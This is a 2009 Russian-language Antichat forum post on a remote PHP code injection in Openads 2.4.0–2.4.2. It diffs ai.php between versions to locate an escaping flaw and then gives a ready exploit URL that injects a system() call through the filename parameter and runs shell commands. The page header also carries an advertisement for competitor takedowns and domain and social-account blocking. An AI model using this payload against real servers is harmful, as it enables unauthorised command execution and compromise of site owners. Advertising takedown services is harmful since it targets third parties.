Форум АНТИЧАТ - Openads 2.4.0<=x<=2.4.2 выполнение php кода

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Openads 2.4.0<=x<=2.4.2 выполнение php кода

Опции темы

Поиск в этой теме

Опции просмотра

Openads 2.4.0<=x<=2.4.2 выполнение php кода

23.05.2009, 18:15

(Dm)

Reservists Of Antichat - Level 6

Регистрация: 08.04.2008

Сообщений: 286

Провел на форуме:
2375131

Репутация: 1695

Openads 2.4.0<=x<=2.4.2 выполнение php кода

Существует уязвимость:
Openads 2.4.0 <= x <= 2.4.2
Vulnerability: Remote PHP code injection and execution

Cплойта не нашел, собственно как и описание уязвимости.
Скачал Openads 2.4.2 и Openads 2.4.3

PHP код:


		
			
diff -r openads-2.4.2/www/delivery/ai.php openads-2.4.3/www/delivery/ai.php

28c28

< $Id: ai.php 12787 2007-11-26 10:00:33Z andrzej.swedrzynski@openads.org $

---

> $Id: ai.php 14232 2008-01-09 17:30:42Z andrzej.swedrzynski@openads.org $

1094,1097c1094,1100

< } elseif (preg_match('/^.+:.+$/', $what)) {

< list($whatName, $whatValue) = explode(':', $what);

< if ($whatName == 'zone') {

< $whatName = 'zoneid';

---

> } elseif (preg_match('/^(.+):(.+)$/', $what, $matches)) {

> switch ($matches[1]) {

> case 'zoneid':

> case 'zone':        $zoneid     = $matches[2]; break;

> case 'bannerid':    $bannerid   = $matches[2]; break;

> case 'campaignid':  $campaignid = $matches[2]; break;

> case 'clientid':    $clientid   = $matches[2]; break;

1099,1100d1101

< global $$whatName;

< $$whatName = $whatValue;

1329c1330

< $cache_literal .= "$"."cache_name       = '".addcslashes($name, "'")."';\n";  <- тут уязвимость

---

> $cache_literal .= "$"."cache_name       = '".addcslashes($name, "\\'")."';\n";

После изучения функций этого скрипта написал сплоит:
http://localhost/www/delivery/ai.php?filename=antichat.jpg';system($_GET[cmd]);/*&contenttype=antichat&cmd=ls -la

проверял на Openads 2.4.2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Books PHP	FRAGNATIC	PHP, PERL, MySQL, JavaScript	186	21.02.2010 02:41
На PHP, как на "Новые ворота"...	Mertvii-Listopad	Чужие Статьи	7	18.09.2006 12:42
Безопасность в Php, Часть Iii	k00p3r	Чужие Статьи	0	11.07.2005 19:02
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход